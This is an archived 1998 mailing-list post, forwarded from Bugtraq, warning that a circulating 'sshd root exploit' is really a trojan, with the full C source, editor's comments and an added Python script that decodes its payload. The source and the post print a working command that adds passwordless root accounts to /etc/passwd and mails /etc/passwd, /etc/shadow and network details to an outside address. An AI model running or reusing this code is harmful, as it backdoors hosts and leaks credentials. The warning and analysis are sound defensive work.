From owner-freebsd-security Mon Nov 16 09:31:44 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA04686 for freebsd-security-outgoing; Mon, 16 Nov 1998 09:31:44 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from heidegger.uol.com.br (heidegger.uol.com.br [200.230.198.88]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA04574 for ; Mon, 16 Nov 1998 09:30:53 -0800 (PST) (envelope-from agora@agoractvm.com.br)
Received: from agoractvm.com.br ([200.255.84.180]) by heidegger.uol.com.br (8.9.1/8.9.1) with ESMTP id PAA01898; Mon, 16 Nov 1998 15:28:04 -0200 (EDT)
Message-ID: <36505EFA.935A91A5@agoractvm.com.br>
Date: Mon, 16 Nov 1998 15:20:58 -0200
From: Teleinformática
Reply-To: agora@uol.com.br
Organization: ÁGORA C.T.V.M. S/A
X-Mailer: Mozilla 4.5 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Best of Security
CC: Cristiano Colpani, FreeBSD Security, Guilherme Galileo Cox, in0x, "Nilson R. A. de Brito"
Subject: [Fwd: Administrivia]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--
Regards,
Nelson 'Stderr' Brito
Finger Print: A2E0 D90E 413A 515A 10C9 C0CE 4855 D523
E-mail: nelson@cyberspace.org
URL: http://www.angelfire.com/sd/stderr
Public key: See the URL

Received: by pascal (mbox agora) (with Cubic Circle's cucipop (v1.22 1998/04/11) Mon Nov 16 15:22:08 1998)
X-From_: root Mon Nov 16 15:15:59 1998
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by pascal.uol.com.br (8.9.1/8.9.1) with ESMTP id PAA15931; Mon, 16 Nov 1998 15:15:47 -0200 (EDT)
Received: from netspace.org ([128.148.157.6]:9036 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <1487-3110>; Mon, 16 Nov 1998 11:54:32 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4992099 for BUGTRAQ@NETSPACE.ORG; Mon, 16 Nov 1998 11:48:03 -0500
Approved-By: aleph1@DFW.NET
Received: from mhub3.tc.umn.edu (mhub3.tc.umn.edu [128.101.131.43]) by netspace.org (8.8.7/8.8.7) with SMTP id DAA21995 for ; Sun, 15 Nov 1998 03:32:00 -0500
Received: from moby.jaws.umn.edu by mhub3.tc.umn.edu with ESMTP; Sun, 15 Nov 1998 02:31:59 -0600
Received: (from tobkin@localhost) by moby.jaws.umn.edu (8.9.1/8.9.1) id CAA03974; Sun, 15 Nov 1998 02:31:59 -0600 (CST)
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-ID: <199811150831.CAA03974@moby.jaws.umn.edu>
Date: Sun, 15 Nov 1998 02:31:58 -0600
Reply-To: Chris Tobkin
Sender: Bugtraq List
From: Chris Tobkin
Subject: Re: Administrivia
To: BUGTRAQ@netspace.org
In-Reply-To: from "Aleph One" at Nov 14, 98 07:03:31 pm
X-Mozilla-Status2: 00000000

Speaking of trojans/lame scripts, there is a 'root exploit for Linux 2.0.* and possibly 2.1.* SSHD 1.5-1.2.23' going around on some of the efnet channels.. It is actually a spiffed up c script that does:

  echo b4b0::0:0::/:>>/etc/passwd;echo babo::10:10::/: >> /etc/passwd ; (cat /etc/passwd /etc/shadow ;/sbin/ifconfig)|mail kitandjp@hotmail.com

  /bin/sh

If one were to just print out the shellcode this would be immediately obvious. (i.e. printf(""); pipe it through strings to get rid of the control characters..)

The filenames that it has been passed around as are "sshdexp.c" and "sshdwarez.c", which was already referenced on bugtraq... other people can rip this one to shreds with the fetch() which is cute.. and the system("/bin/echo") instead of printf("").

This is, however, a good way to get rid of scriptkiddies that don't know how to write code but want all the benefits of everyone else's intelligence.. Caveat emptor, again.

// chris
tobkin@umn.edu

*************************************************************************
Chris Tobkin                                              tobkin@umn.edu
Java and Web Services - Academic and Distributed Computing Services - UMN
-----------------------------------------------------------------------
"Thanks to the printing press, the deviant smart people were able to
distribute their genius without having to pass it on genetically.
Evolution was short-circuited. We gained knowledge and technology
without gaining intelligence."
                                                          - Scott Adams
*************************************************************************

-- sshdtrojan.c --

/************************************************************************/
/* root exploit for Linux 2.0.* and possible 2.1.* SSHD 1.5-1.2.23      */
/* On some weird systems this causes a segfault                         */
/* If it doesnt work change the offset (usually between 0 and 5000)     */
/* (try increments of 2.......)                                         */
/* TO RUN:                                                              */
/* (./sshdwarez ; cat) | nc victim 22                                   */
/*                                                                      */
/* forever yours: st4n@zdnetmail.com                                    */
/************************************************************************/
/* Editor's note: the archive dropped the header names between the angle
   brackets; the three standard headers below are the obvious ones. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define OFFSET 146
#define NOP 0x90

/* Editor's note: bytes 0-3 are a pointer that main() overwrites with the
   address of system(); bytes 4-144 are the plain-ASCII shell command Chris
   quotes above, byte 145 is its NUL, and only bytes 146-190 are real
   execve("/bin/sh") shellcode. Printing the array makes this obvious. */
char shellcode[] =
"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
"\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31"
"\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
"\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29"
"\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f"
"\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int fetch(int *w){
  /* push and return something from the stack */
  /* Editor's note: *w is the address of system() by the time this runs, and
     stack gets the OFFSET-5 = 141 bytes of command text that follow it, so
     push(stack) is system("echo b4b0...|mail ...") on the machine of whoever
     runs this binary. The copy is not NUL-terminated; it relies on the stack
     happening to hold a zero after the command. */
  char stack[4096];
  int (*push)();
  memcpy((int*)&push,w,sizeof(int));
  memcpy(stack,(char*)w+4,OFFSET-5);
  push(stack);
  return *w;
}

int i;
char *p;

main(int argc,char**argv)
{
  char s[1024];
  char ssh[] = "\x8c\xfd\xff\xbf\x48\x9b"; /* starts ssh session */
  strcpy(argv[0],"vi "); /* Editor's note: changes the name shown by ps */
  if (getuid()) {
    system("/bin/echo this program uses priveledged ports. " "run as root.");
    return -1;
  }
  write(1,ssh,sizeof(ssh));
  for (i=0;i<500;i++) s[i]=NOP;
  p=&s[i];
  memcpy(p,&shellcode[OFFSET],sizeof(shellcode)-OFFSET);
  /* most [linux] systems keep libc functions in the same place */
  /* Editor's note: this stores the address of system() in the first four
     bytes of shellcode[], which is exactly what fetch() below calls. */
  i=(int)system;memcpy(&shellcode,&i,sizeof(int));
  write(1,s,500+(sizeof(shellcode)-OFFSET));
  fetch((int*)&shellcode);
  usleep(1000000);
  return 0;
}

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
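Chris's suggestion (print the shellcode and pipe it through strings) carried out in Python, as an added example that is not part of the Bugtraq post: it takes the shellcode[] bytes exactly as posted, splits them the way fetch() consumes them, and reports what the embedded command would do to the host that runs the "exploit". The INDICATORS patterns and the function names are ours, not the post's.

```python
import re
import struct

# shellcode[] copied byte-for-byte from sshdtrojan.c (C hex escapes are valid Python bytes escapes)
SHELLCODE = (
    b"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a"
    b"\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
    b"\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31"
    b"\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
    b"\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
    b"\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
    b"\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29"
    b"\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f"
    b"\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31"
    b"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    b"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
)
OFFSET = 146  # the #define OFFSET from the posted source

# Behaviour a reviewer would not expect from a remote sshd exploit (patterns are ours, not the post's).
INDICATORS = [
    (r">>\s*/etc/passwd", "appends accounts to the local /etc/passwd"),
    (r"/etc/shadow", "reads the local shadow file"),
    (r"\|\s*mail\s+\S+@\S+", "mails command output to a third party"),
]

def printable_strings(buf: bytes, min_len: int = 4) -> list[str]:
    """What strings(1) would show: runs of >= min_len printable ASCII bytes."""
    pat = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, buf)]

def triage(buf: bytes, offset: int = OFFSET) -> dict:
    """Split the blob the way fetch() consumes it: a 4-byte function pointer (main()
    patches in the address of system()), then OFFSET-5 bytes handed to that function."""
    ptr = struct.unpack("<I", buf[:4])[0]      # little-endian i386 pointer
    cmd = buf[4:4 + offset - 5]                # memcpy(stack, (char*)w+4, OFFSET-5)
    command = cmd.decode("ascii", errors="replace")
    return {
        "function_pointer": ptr,
        "command": command,
        "nul_terminated": buf[4 + len(cmd)] == 0,
        "leftover": buf[offset:],              # the only part that is real shellcode
        "findings": [why for pat, why in INDICATORS if re.search(pat, command)],
    }

if __name__ == "__main__":
    report = triage(SHELLCODE)
    print("strings:", printable_strings(SHELLCODE))
    print("system() on the runner's own host would get:", report["command"], report["findings"])
```

The same split generalises to any "exploit" whose payload array is fed to a function pointer inside the program rather than to the target: if the bytes between the pointer and the NUL decode as a shell command, the only machine it will ever run on is yours.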